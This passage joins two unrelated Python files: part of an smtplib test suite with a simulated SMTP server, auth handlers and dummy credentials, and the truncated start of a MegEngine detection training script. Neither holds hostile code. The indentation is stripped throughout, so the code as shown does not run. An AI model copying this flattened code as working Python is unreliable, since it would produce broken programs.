debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: holy@grail.net$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('my_mom@great.cooker.com', 'Jeff', 'doe@losthope.net'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertRegex(debugout, to_addr)
def testSendMessageMultipleResentRaises(self):
m = email.mime.text.MIMEText('A test message')
m['From'] = 'foo@bar.com'
m['To'] = 'John'
m['CC'] = 'Sally, Fred'
m['Bcc'] = 'John Root <root@localhost>, "Dinsdale" <warped@silly.walks.com>'
m['Resent-Date'] = 'Thu, 1 Jan 1970 17:42:00 +0000'
m['Resent-From'] = 'holy@grail.net'
m['Resent-To'] = 'Martha <my_mom@great.cooker.com>, Jeff'
m['Resent-Bcc'] = 'doe@losthope.net'
m['Resent-Date'] = 'Thu, 2 Jan 1970 17:42:00 +0000'
m['Resent-To'] = 'holy@grail.net'
m['Resent-From'] = 'Martha <my_mom@great.cooker.com>, Jeff'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
with self.assertRaises(ValueError):
smtp.send_message(m)
smtp.close()
class NonConnectingTests(unittest.TestCase):
def testNotConnected(self):
# Test various operations on an unconnected SMTP object that
# should raise exceptions (at present the attempt in SMTP.send
# to reference the nonexistent 'sock' attribute of the SMTP object
# causes an AttributeError)
smtp = smtplib.SMTP()
self.assertRaises(smtplib.SMTPServerDisconnected, smtp.ehlo)
self.assertRaises(smtplib.SMTPServerDisconnected,
smtp.send, 'test msg')
def testNonnumericPort(self):
# check that non-numeric port raises OSError
self.assertRaises(OSError, smtplib.SMTP,
"localhost", "bogus")
self.assertRaises(OSError, smtplib.SMTP,
"localhost:bogus")
def testSockAttributeExists(self):
# check that sock attribute is present outside of a connect() call
# (regression test, the previous behavior raised an
# AttributeError: 'SMTP' object has no attribute 'sock')
with smtplib.SMTP() as smtp:
self.assertIsNone(smtp.sock)
class DefaultArgumentsTests(unittest.TestCase):
def setUp(self):
self.msg = EmailMessage()
self.msg['From'] = 'Páolo <főo@bar.com>'
self.smtp = smtplib.SMTP()
self.smtp.ehlo = Mock(return_value=(200, 'OK'))
self.smtp.has_extn, self.smtp.sendmail = Mock(), Mock()
def testSendMessage(self):
expected_mail_options = ('SMTPUTF8', 'BODY=8BITMIME')
self.smtp.send_message(self.msg)
self.smtp.send_message(self.msg)
self.assertEqual(self.smtp.sendmail.call_args_list[0][0][3],
expected_mail_options)
self.assertEqual(self.smtp.sendmail.call_args_list[1][0][3],
expected_mail_options)
def testSendMessageWithMailOptions(self):
mail_options = ['STARTTLS']
expected_mail_options = ('STARTTLS', 'SMTPUTF8', 'BODY=8BITMIME')
self.smtp.send_message(self.msg, None, None, mail_options)
self.assertEqual(mail_options, ['STARTTLS'])
self.assertEqual(self.smtp.sendmail.call_args_list[0][0][3],
expected_mail_options)
# test response of client to a non-successful HELO message
class BadHELOServerTests(unittest.TestCase):
def setUp(self):
smtplib.socket = mock_socket
mock_socket.reply_with(b"199 no hello for you!")
self.old_stdout = sys.stdout
self.output = io.StringIO()
sys.stdout = self.output
self.port = 25
def tearDown(self):
smtplib.socket = socket
sys.stdout = self.old_stdout
def testFailingHELO(self):
self.assertRaises(smtplib.SMTPConnectError, smtplib.SMTP,
HOST, self.port, 'localhost', 3)
class TooLongLineTests(unittest.TestCase):
respdata = b'250 OK' + (b'.' * smtplib._MAXLINE * 2) + b'\n'
def setUp(self):
self.thread_key = threading_setup()
self.old_stdout = sys.stdout
self.output = io.StringIO()
sys.stdout = self.output
self.evt = threading.Event()
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.settimeout(15)
self.port = support.bind_port(self.sock)
servargs = (self.evt, self.respdata, self.sock)
self.thread = threading.Thread(target=server, args=servargs)
self.thread.start()
self.evt.wait()
self.evt.clear()
def tearDown(self):
self.evt.wait()
sys.stdout = self.old_stdout
join_thread(self.thread)
del self.thread
self.doCleanups()
threading_cleanup(*self.thread_key)
def testLineTooLong(self):
self.assertRaises(smtplib.SMTPResponseException, smtplib.SMTP,
HOST, self.port, 'localhost', 3)
sim_users = {'Mr.A@somewhere.com':'John A',
'Ms.B@xn--fo-fka.com':'Sally B',
'Mrs.C@somewhereesle.com':'Ruth C',
}
sim_auth = ('Mr.A@somewhere.com', 'somepassword')
sim_cram_md5_challenge = ('PENCeUxFREJoU0NnbmhNWitOMjNGNn'
'dAZWx3b29kLmlubm9zb2Z0LmNvbT4=')
sim_lists = {'list-1':['Mr.A@somewhere.com','Mrs.C@somewhereesle.com'],
'list-2':['Ms.B@xn--fo-fka.com',],
}
# Simulated SMTP channel & server
class ResponseException(Exception): pass
class SimSMTPChannel(smtpd.SMTPChannel):
quit_response = None
mail_response = None
rcpt_response = None
data_response = None
rcpt_count = 0
rset_count = 0
disconnect = 0
AUTH = 99 # Add protocol state to enable auth testing.
authenticated_user = None
def __init__(self, extra_features, *args, **kw):
self._extrafeatures = ''.join(
[ "250-{0}\r\n".format(x) for x in extra_features ])
super(SimSMTPChannel, self).__init__(*args, **kw)
# AUTH related stuff. It would be nice if support for this were in smtpd.
def found_terminator(self):
if self.smtp_state == self.AUTH:
line = self._emptystring.join(self.received_lines)
print('Data:', repr(line), file=smtpd.DEBUGSTREAM)
self.received_lines = []
try:
self.auth_object(line)
except ResponseException as e:
self.smtp_state = self.COMMAND
self.push('%s %s' % (e.smtp_code, e.smtp_error))
return
super().found_terminator()
def smtp_AUTH(self, arg):
if not self.seen_greeting:
self.push('503 Error: send EHLO first')
return
if not self.extended_smtp or 'AUTH' not in self._extrafeatures:
self.push('500 Error: command "AUTH" not recognized')
return
if self.authenticated_user is not None:
self.push(
'503 Bad sequence of commands: already authenticated')
return
args = arg.split()
if len(args) not in [1, 2]:
self.push('501 Syntax: AUTH <mechanism> [initial-response]')
return
auth_object_name = '_auth_%s' % args[0].lower().replace('-', '_')
try:
self.auth_object = getattr(self, auth_object_name)
except AttributeError:
self.push('504 Command parameter not implemented: unsupported '
' authentication mechanism {!r}'.format(auth_object_name))
return
self.smtp_state = self.AUTH
self.auth_object(args[1] if len(args) == 2 else None)
def _authenticated(self, user, valid):
if valid:
self.authenticated_user = user
self.push('235 Authentication Succeeded')
else:
self.push('535 Authentication credentials invalid')
self.smtp_state = self.COMMAND
def _decode_base64(self, string):
return base64.decodebytes(string.encode('ascii')).decode('utf-8')
def _auth_plain(self, arg=None):
if arg is None:
self.push('334 ')
else:
logpass = self._decode_base64(arg)
try:
*_, user, password = logpass.split('\0')
except ValueError as e:
self.push('535 Splitting response {!r} into user and password'
' failed: {}'.format(logpass, e))
return
self._authenticated(user, password == sim_auth[1])
def _auth_login(self, arg=None):
if arg is None:
# base64 encoded 'Username:'
self.push('334 VXNlcm5hbWU6')
elif not hasattr(self, '_auth_login_user'):
self._auth_login_user = self._decode_base64(arg)
# base64 encoded 'Password:'
self.push('334 UGFzc3dvcmQ6')
else:
password = self._decode_base64(arg)
self._authenticated(self._auth_login_user, password == sim_auth[1])
del self._auth_login_user
def _auth_cram_md5(self, arg=None):
if arg is None:
self.push('334 {}'.format(sim_cram_md5_challenge))
else:
logpass = self._decode_base64(arg)
try:
user, hashed_pass = logpass.split()
except ValueError as e:
self.push('535 Splitting response {!r} into user and password '
'failed: {}'.format(logpass, e))
return False
valid_hashed_pass = hmac.HMAC(
sim_auth[1].encode('ascii'),
self._decode_base64(sim_cram_md5_challenge).encode('ascii'),
'md5').hexdigest()
self._authenticated(user, hashed_pass == valid_hashed_pass)
# end AUTH related stuff.
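    # (For reference: in the CRAM-MD5 exchange handled above, the client
    # answers the base64 challenge with "<username> <hexdigest>", where the
    # digest is HMAC-MD5 of the decoded challenge keyed with the account
    # password -- exactly what _auth_cram_md5() recomputes to verify a login.)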
def smtp_EHLO(self, arg):
resp = ('250-testhost\r\n'
'250-EXPN\r\n'
'250-SIZE 20000000\r\n'
'250-STARTTLS\r\n'
'250-DELIVERBY\r\n')
resp = resp + self._extrafeatures + '250 HELP'
self.push(resp)
self.seen_greeting = arg
self.extended_smtp = True
def smtp_VRFY(self, arg):
# For max compatibility smtplib should be sending the raw address.
if arg in sim_users:
self.push('250 %s %s' % (sim_users[arg], smtplib.quoteaddr(arg)))
else:
self.push('550 No such user: %s' % arg)
def smtp_EXPN(self, arg):
list_name = arg.lower()
if list_name in sim_lists:
user_list = sim_lists[list_name]
for n, user_email in enumerate(user_list):
quoted_addr = smtplib.quoteaddr(user_email)
if n < len(user_list) - 1:
self.push('250-%s %s' % (sim_users[user_email], quoted_addr))
else:
self.push('250 %s %s' % (sim_users[user_email], quoted_addr))
else:
self.push('550 No access for you!')
def smtp_QUIT(self, arg):
if self.quit_response is None:
super(SimSMTPChannel, self).smtp_QUIT(arg)
else:
self.push(self.quit_response)
self.close_when_done()
def smtp_MAIL(self, arg):
if self.mail_response is None:
super().smtp_MAIL(arg)
else:
self.push(self.mail_response)
if self.disconnect:
self.close_when_done()
def smtp_RCPT(self, arg):
if self.rcpt_response is None:
super().smtp_RCPT(arg)
return
self.rcpt_count += 1
self.push(self.rcpt_response[self.rcpt_count-1])
def smtp_RSET(self, arg):
self.rset_count += 1
super().smtp_RSET(arg)
def smtp_DATA(self, arg):
if self.data_response is None:
super().smtp_DATA(arg)
else:
self.push(self.data_response)
def handle_error(self):
raise
class SimSMTPServer(smtpd.SMTPServer):
channel_class = SimSMTPChannel
def __init__(self, *args, **kw):
self._extra_features = []
self._addresses = {}
smtpd.SMTPServer.__init__(self, *args, **kw)
def handle_accepted(self, conn, addr):
self._SMTPchannel = self.channel_class(
self._extra_features, self, conn, addr,
decode_data=self._decode_data)
def process_message(self, peer, mailfrom, rcpttos, data):
self._addresses['from'] = mailfrom
self._addresses['tos'] = rcpttos
def add_feature(self, feature):
self._extra_features.append(feature)
def handle_error(self):
raise
# Test various SMTP & ESMTP commands/behaviors that require a simulated server
# (i.e., something with more features than DebuggingServer)
class SMTPSimTests(unittest.TestCase):
def setUp(self):
self.thread_key = threading_setup()
self.real_getfqdn = socket.getfqdn
socket.getfqdn = mock_socket.getfqdn
self.serv_evt = threading.Event()
self.client_evt = threading.Event()
# Pick a random unused port by passing 0 for the port number
self.serv = SimSMTPServer((HOST, 0), ('nowhere', -1), decode_data=True)
# Keep a note of what port was assigned
self.port = self.serv.socket.getsockname()[1]
serv_args = (self.serv, self.serv_evt, self.client_evt)
self.thread = threading.Thread(target=debugging_server, args=serv_args)
self.thread.start()
# wait until server thread has assigned a port number
self.serv_evt.wait()
self.serv_evt.clear()
def tearDown(self):
socket.getfqdn = self.real_getfqdn
# indicate that the client is finished
self.client_evt.set()
# wait for the server thread to terminate
self.serv_evt.wait()
join_thread(self.thread)
del self.thread
self.doCleanups()
threading_cleanup(*self.thread_key)
def testBasic(self):
# smoke test
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
smtp.quit()
def testEHLO(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
# no features should be present before the EHLO
self.assertEqual(smtp.esmtp_features, {})
# features expected from the test server
expected_features = {'expn':'',
'size': '20000000',
'starttls': '',
'deliverby': '',
'help': '',
}
smtp.ehlo()
self.assertEqual(smtp.esmtp_features, expected_features)
for k in expected_features:
self.assertTrue(smtp.has_extn(k))
self.assertFalse(smtp.has_extn('unsupported-feature'))
smtp.quit()
def testVRFY(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
for addr_spec, name in sim_users.items():
expected_known = (250, bytes('%s %s' %
(name, smtplib.quoteaddr(addr_spec)),
"ascii"))
self.assertEqual(smtp.vrfy(addr_spec), expected_known)
u = 'nobody@nowhere.com'
expected_unknown = (550, ('No such user: %s' % u).encode('ascii'))
self.assertEqual(smtp.vrfy(u), expected_unknown)
smtp.quit()
def testEXPN(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
for listname, members in sim_lists.items():
users = []
for m in members:
users.append('%s %s' % (sim_users[m], smtplib.quoteaddr(m)))
expected_known = (250, bytes('\n'.join(users), "ascii"))
self.assertEqual(smtp.expn(listname), expected_known)
u = 'PSU-Members-List'
expected_unknown = (550, b'No access for you!')
self.assertEqual(smtp.expn(u), expected_unknown)
smtp.quit()
def testAUTH_PLAIN(self):
self.serv.add_feature("AUTH PLAIN")
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
resp = smtp.login(sim_auth[0], sim_auth[1])
self.assertEqual(resp, (235, b'Authentication Succeeded'))
smtp.close()
def testAUTH_LOGIN(self):
self.serv.add_feature("AUTH LOGIN")
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
resp = smtp.login(sim_auth[0], sim_auth[1])
self.assertEqual(resp, (235, b'Authentication Succeeded'))
smtp.close()
@requires_hashdigest('md5')
def testAUTH_CRAM_MD5(self):
self.serv.add_feature("AUTH CRAM-MD5")
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
resp = smtp.login(sim_auth[0], sim_auth[1])
self.assertEqual(resp, (235, b'Authentication Succeeded'))
smtp.close()
def testAUTH_multiple(self):
# Test that multiple authentication methods are tried.
self.serv.add_feature("AUTH BOGUS PLAIN LOGIN CRAM-MD5")
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
resp = smtp.login(sim_auth[0], sim_auth[1])
self.assertEqual(resp, (235, b'Authentication Succeeded'))
smtp.close()
def test_auth_function(self):
supported = {'PLAIN', 'LOGIN'}
try:
hashlib.md5()
except ValueError:
pass
else:
supported.add('CRAM-MD5')
for mechanism in supported:
self.serv.add_feature("AUTH {}".format(mechanism))
for mechanism in supported:
with self.subTest(mechanism=mechanism):
smtp = smtplib.SMTP(HOST, self.port,
local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
smtp.ehlo('foo')
smtp.user, smtp.password = sim_auth[0], sim_auth[1]
method = 'auth_' + mechanism.lower().replace('-', '_')
resp = smtp.auth(mechanism, getattr(smtp, method))
self.assertEqual(resp, (235, b'Authentication Succeeded'))
smtp.close()
def test_quit_resets_greeting(self):
smtp = smtplib.SMTP(HOST, self.port,
local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
code, message = smtp.ehlo()
self.assertEqual(code, 250)
self.assertIn('size', smtp.esmtp_features)
smtp.quit()
self.assertNotIn('size', smtp.esmtp_features)
smtp.connect(HOST, self.port)
self.assertNotIn('size', smtp.esmtp_features)
smtp.ehlo_or_helo_if_needed()
self.assertIn('size', smtp.esmtp_features)
smtp.quit()
def test_with_statement(self):
with smtplib.SMTP(HOST, self.port) as smtp:
code, message = smtp.noop()
self.assertEqual(code, 250)
self.assertRaises(smtplib.SMTPServerDisconnected, smtp.send, b'foo')
with smtplib.SMTP(HOST, self.port) as smtp:
smtp.close()
self.assertRaises(smtplib.SMTPServerDisconnected, smtp.send, b'foo')
def test_with_statement_QUIT_failure(self):
with self.assertRaises(smtplib.SMTPResponseException) as error:
with smtplib.SMTP(HOST, self.port) as smtp:
smtp.noop()
self.serv._SMTPchannel.quit_response = '421 QUIT FAILED'
self.assertEqual(error.exception.smtp_code, 421)
self.assertEqual(error.exception.smtp_error, b'QUIT FAILED')
#TODO: add tests for correct AUTH method fallback now that the
#test infrastructure can support it.
# Issue 17498: make sure _rset does not raise SMTPServerDisconnected exception
    def test__rset_from_mail_cmd(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
smtp.noop()
self.serv._SMTPchannel.mail_response = '451 Requested action aborted'
self.serv._SMTPchannel.disconnect = True
with self.assertRaises(smtplib.SMTPSenderRefused):
smtp.sendmail('John', 'Sally', 'test message')
self.assertIsNone(smtp.sock)
# Issue 5713: make sure close, not rset, is called if we get a 421 error
def test_421_from_mail_cmd(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
smtp.noop()
self.serv._SMTPchannel.mail_response = '421 closing connection'
with self.assertRaises(smtplib.SMTPSenderRefused):
smtp.sendmail('John', 'Sally', 'test message')
self.assertIsNone(smtp.sock)
self.assertEqual(self.serv._SMTPchannel.rset_count, 0)
def test_421_from_rcpt_cmd(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
smtp.noop()
self.serv._SMTPchannel.rcpt_response = ['250 accepted', '421 closing']
with self.assertRaises(smtplib.SMTPRecipientsRefused) as r:
smtp.sendmail('John', ['Sally', 'Frank', 'George'], 'test message')
self.assertIsNone(smtp.sock)
self.assertEqual(self.serv._SMTPchannel.rset_count, 0)
self.assertDictEqual(r.exception.args[0], {'Frank': (421, b'closing')})
def test_421_from_data_cmd(self):
class MySimSMTPChannel(SimSMTPChannel):
def found_terminator(self):
if self.smtp_state == self.DATA:
self.push('421 closing')
else:
super().found_terminator()
self.serv.channel_class = MySimSMTPChannel
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
smtp.noop()
with self.assertRaises(smtplib.SMTPDataError):
smtp.sendmail('John@foo.org', ['Sally@foo.org'], 'test message')
self.assertIsNone(smtp.sock)
self.assertEqual(self.serv._SMTPchannel.rcpt_count, 0)
def test_smtputf8_NotSupportedError_if_no_server_support(self):
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.ehlo()
self.assertTrue(smtp.does_esmtp)
self.assertFalse(smtp.has_extn('smtputf8'))
self.assertRaises(
smtplib.SMTPNotSupportedError,
smtp.sendmail,
'John', 'Sally', '', mail_options=['BODY=8BITMIME', 'SMTPUTF8'])
self.assertRaises(
smtplib.SMTPNotSupportedError,
smtp.mail, 'John', options=['BODY=8BITMIME', 'SMTPUTF8'])
def test_send_unicode_without_SMTPUTF8(self):
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
self.assertRaises(UnicodeEncodeError, smtp.sendmail, 'Alice', 'Böb', '')
self.assertRaises(UnicodeEncodeError, smtp.mail, 'Älice')
def test_send_message_error_on_non_ascii_addrs_if_no_smtputf8(self):
# This test is located here and not in the SMTPUTF8SimTests
# class because it needs a "regular" SMTP server to work
msg = EmailMessage()
msg['From'] = "Páolo <főo@bar.com>"
msg['To'] = 'Dinsdale'
msg['Subject'] = 'Nudge nudge, wink, wink \u1F609'
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
with self.assertRaises(smtplib.SMTPNotSupportedError):
smtp.send_message(msg)
def test_name_field_not_included_in_envelop_addresses(self):
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
message = EmailMessage()
message['From'] = email.utils.formataddr(('Michaël', 'michael@example.com'))
message['To'] = email.utils.formataddr(('René', 'rene@example.com'))
self.assertDictEqual(smtp.send_message(message), {})
self.assertEqual(self.serv._addresses['from'], 'michael@example.com')
self.assertEqual(self.serv._addresses['tos'], ['rene@example.com'])
class SimSMTPUTF8Server(SimSMTPServer):
def __init__(self, *args, **kw):
# The base SMTP server turns these on automatically, but our test
# server is set up to munge the EHLO response, so we need to provide
# them as well. And yes, the call is to SMTPServer not SimSMTPServer.
self._extra_features = ['SMTPUTF8', '8BITMIME']
smtpd.SMTPServer.__init__(self, *args, **kw)
def handle_accepted(self, conn, addr):
self._SMTPchannel = self.channel_class(
self._extra_features, self, conn, addr,
decode_data=self._decode_data,
enable_SMTPUTF8=self.enable_SMTPUTF8,
)
def process_message(self, peer, mailfrom, rcpttos, data, mail_options=None,
rcpt_options=None):
self.last_peer = peer
self.last_mailfrom = mailfrom
self.last_rcpttos = rcpttos
self.last_message = data
self.last_mail_options = mail_options
self.last_rcpt_options = rcpt_options
class SMTPUTF8SimTests(unittest.TestCase):
maxDiff = None
def setUp(self):
self.thread_key = threading_setup()
self.real_getfqdn = socket.getfqdn
socket.getfqdn = mock_socket.getfqdn
self.serv_evt = threading.Event()
self.client_evt = threading.Event()
# Pick a random unused port by passing 0 for the port number
self.serv = SimSMTPUTF8Server((HOST, 0), ('nowhere', -1),
decode_data=False,
enable_SMTPUTF8=True)
# Keep a note of what port was assigned
self.port = self.serv.socket.getsockname()[1]
serv_args = (self.serv, self.serv_evt, self.client_evt)
self.thread = threading.Thread(target=debugging_server, args=serv_args)
self.thread.start()
# wait until server thread has assigned a port number
self.serv_evt.wait()
self.serv_evt.clear()
def tearDown(self):
socket.getfqdn = self.real_getfqdn
# indicate that the client is finished
self.client_evt.set()
# wait for the server thread to terminate
self.serv_evt.wait()
join_thread(self.thread)
del self.thread
self.doCleanups()
threading_cleanup(*self.thread_key)
def test_test_server_supports_extensions(self):
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.ehlo()
self.assertTrue(smtp.does_esmtp)
self.assertTrue(smtp.has_extn('smtputf8'))
def test_send_unicode_with_SMTPUTF8_via_sendmail(self):
m = '¡a test message containing unicode!'.encode('utf-8')
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.sendmail('Jőhn', 'Sálly', m,
mail_options=['BODY=8BITMIME', 'SMTPUTF8'])
self.assertEqual(self.serv.last_mailfrom, 'Jőhn')
self.assertEqual(self.serv.last_rcpttos, ['Sálly'])
self.assertEqual(self.serv.last_message, m)
self.assertIn('BODY=8BITMIME', self.serv.last_mail_options)
self.assertIn('SMTPUTF8', self.serv.last_mail_options)
self.assertEqual(self.serv.last_rcpt_options, [])
def test_send_unicode_with_SMTPUTF8_via_low_level_API(self):
m = '¡a test message containing unicode!'.encode('utf-8')
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.ehlo()
self.assertEqual(
smtp.mail('Jő', options=['BODY=8BITMIME', 'SMTPUTF8']),
(250, b'OK'))
self.assertEqual(smtp.rcpt('János'), (250, b'OK'))
self.assertEqual(smtp.data(m), (250, b'OK'))
self.assertEqual(self.serv.last_mailfrom, 'Jő')
self.assertEqual(self.serv.last_rcpttos, ['János'])
self.assertEqual(self.serv.last_message, m)
self.assertIn('BODY=8BITMIME', self.serv.last_mail_options)
self.assertIn('SMTPUTF8', self.serv.last_mail_options)
self.assertEqual(self.serv.last_rcpt_options, [])
def test_send_message_uses_smtputf8_if_addrs_non_ascii(self):
msg = EmailMessage()
msg['From'] = "Páolo <főo@bar.com>"
msg['To'] = 'Dinsdale'
msg['Subject'] = 'Nudge nudge, wink, wink \u1F609'
# XXX I don't know why I need two \n's here, but this is an existing
# bug (if it is one) and not a problem with the new functionality.
msg.set_content("oh là là, know what I mean, know what I mean?\n\n")
        # XXX smtpd converts received \r\n to \n, so we can't easily test that
        # we are successfully sending \r\n :(.
expected = textwrap.dedent("""\
From: Páolo <főo@bar.com>
To: Dinsdale
Subject: Nudge nudge, wink, wink \u1F609
Content-Type: text/plain; charset="utf-8"
Content-Transfer-Encoding: 8bit
MIME-Version: 1.0
oh là là, know what I mean, know what I mean?
""")
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
self.assertEqual(smtp.send_message(msg), {})
self.assertEqual(self.serv.last_mailfrom, 'főo@bar.com')
self.assertEqual(self.serv.last_rcpttos, ['Dinsdale'])
self.assertEqual(self.serv.last_message.decode(), expected)
self.assertIn('BODY=8BITMIME', self.serv.last_mail_options)
self.assertIn('SMTPUTF8', self.serv.last_mail_options)
self.assertEqual(self.serv.last_rcpt_options, [])
EXPECTED_RESPONSE = encode_base64(b'\0psu\0doesnotexist', eol='')
class SimSMTPAUTHInitialResponseChannel(SimSMTPChannel):
def smtp_AUTH(self, arg):
# RFC 4954's AUTH command allows for an optional initial-response.
        # Not all AUTH methods support this; some require a challenge. AUTH
        # PLAIN does support the initial-response, so test that here. See issue #15014.
args = arg.split()
if args[0].lower() == 'plain':
if len(args) == 2:
# AUTH PLAIN <initial-response> with the response base 64
# encoded. Hard code the expected response for the test.
if args[1] == EXPECTED_RESPONSE:
self.push('235 Ok')
return
self.push('571 Bad authentication')
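    # Illustrative sketch (not part of the original test suite): with the credentials
    # used in the tests below, the initial-response exchange would look roughly like
    #   C: AUTH PLAIN AHBzdQBkb2Vzbm90ZXhpc3Q=
    #   S: 235 Ok
    # where the argument is base64(b'\0psu\0doesnotexist'), i.e. EXPECTED_RESPONSE above.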
class SimSMTPAUTHInitialResponseServer(SimSMTPServer):
channel_class = SimSMTPAUTHInitialResponseChannel
class SMTPAUTHInitialResponseSimTests(unittest.TestCase):
def setUp(self):
self.thread_key = threading_setup()
self.real_getfqdn = socket.getfqdn
socket.getfqdn = mock_socket.getfqdn
self.serv_evt = threading.Event()
self.client_evt = threading.Event()
# Pick a random unused port by passing 0 for the port number
self.serv = SimSMTPAUTHInitialResponseServer(
(HOST, 0), ('nowhere', -1), decode_data=True)
# Keep a note of what port was assigned
self.port = self.serv.socket.getsockname()[1]
serv_args = (self.serv, self.serv_evt, self.client_evt)
self.thread = threading.Thread(target=debugging_server, args=serv_args)
self.thread.start()
# wait until server thread has assigned a port number
self.serv_evt.wait()
self.serv_evt.clear()
def tearDown(self):
socket.getfqdn = self.real_getfqdn
# indicate that the client is finished
self.client_evt.set()
# wait for the server thread to terminate
self.serv_evt.wait()
join_thread(self.thread)
del self.thread
self.doCleanups()
threading_cleanup(*self.thread_key)
def testAUTH_PLAIN_initial_response_login(self):
self.serv.add_feature('AUTH PLAIN')
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
smtp.login('psu', 'doesnotexist')
smtp.close()
def testAUTH_PLAIN_initial_response_auth(self):
self.serv.add_feature('AUTH PLAIN')
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
smtp.user = 'psu'
smtp.password = 'doesnotexist'
code, response = smtp.auth('plain', smtp.auth_plain)
smtp.close()
self.assertEqual(code, 235)
if __name__ == '__main__':
unittest.main()
|
train.py
|
# -*- coding: utf-8 -*-
# MegEngine is Licensed under the Apache License, Version 2.0 (the "License")
#
# Copyright (c) 2014-2020 Megvii Inc. All rights reserved.
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT ARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
import argparse
import bisect
import copy
import multiprocessing as mp
import os
import time
import megengine as mge
import megengine.distributed as dist
from megengine.autodiff import GradManager
from megengine.data import DataLoader, Infinite, RandomSampler
from megengine.data import transform as T
from megengine.optimizer import SGD
from official.vision.detection.tools.data_mapper import data_mapper
from official.vision.detection.tools.utils import (
AverageMeter,
DetectionPadCollator,
GroupedRandomSampler,
get_config_info,
import_from_file
)
logger = mge.get_logger(__name__)
logger.setLevel("INFO")
def make_parser():
parser = argparse.ArgumentParser()
parser.add_argument(
"-f", "--file", default="net.py", type=str, help="net description file"
)
parser.add_argument(
"-w", "--weight_file", default=None, type=str, help="weights file",
)
parser.add_argument(
"-n", "--ngpus", default=1, type=int, help="total number of gpus for training",
)
parser.add_argument(
"-b", "--batch_size", default=2, type=int, help="batch size for training",
)
parser.add_argument(
"-d", "--dataset_dir", default="/data/datasets", type=str,
)
return parser
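# Example invocation (illustrative only; the net description file and paths are hypothetical):
#   python3 train.py -f retinanet.py -n 8 -b 2 -d /data/datasets -w pretrained_backbone.pkl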
def main():
parser = make_parser()
args = parser.parse_args()
# ------------------------ begin training -------------------------- #
logger.info("Device Count = %d", args.ngpus)
log_dir = "log-of-{}".format(os.path.basename(args.file).split(".")[0])
if not os.path.isdir(log_dir):
os.makedirs(log_dir)
if args.ngpus > 1:
master_ip = "localhost"
port = dist.get_free_ports(1)[0]
dist.Server(port)
processes = list()
for rank in range(args.ngpus):
process = mp.Process(
target=worker, args=(master_ip, port, args.ngpus, rank, args)
)
process.start()
processes.append(process)
for p in processes:
p.join()
else:
worker(None, None, 1, 0, args)
def worker(master_ip, port, world_size, rank, args):
if world_size > 1:
dist.init_process_group(
master_ip=master_ip,
port=port,
world_size=world_size,
rank=rank,
device=rank,
)
logger.info("Init process group for gpu{} done".format(rank))
current_network = import_from_file(args.file)
model = current_network.Net(current_network.Cfg())
model.train()
if dist.get_rank() == 0:
logger.info(get_config_info(model.cfg))
logger.info(repr(model))
params_with_grad = []
for name, param in model.named_parameters():
if "bottom_up.conv1" in name and model.cfg.backbone_freeze_at >= 1:
continue
if "bottom_up.layer1" in name and model.cfg.backbone_freeze_at >= 2:
continue
params_with_grad.append(param)
opt = SGD(
params_with_grad,
lr=model.cfg.basic_lr * args.batch_size,
momentum=model.cfg.momentum,
weight_decay=model.cfg.weight_decay * dist.get_world_size(),
)
gm = GradManager()
if dist.get_world_size() > 1:
gm.attach(
params_with_grad,
callbacks=[dist.make_allreduce_cb("SUM", dist.WORLD)]
)
else:
gm.attach(params_with_grad)
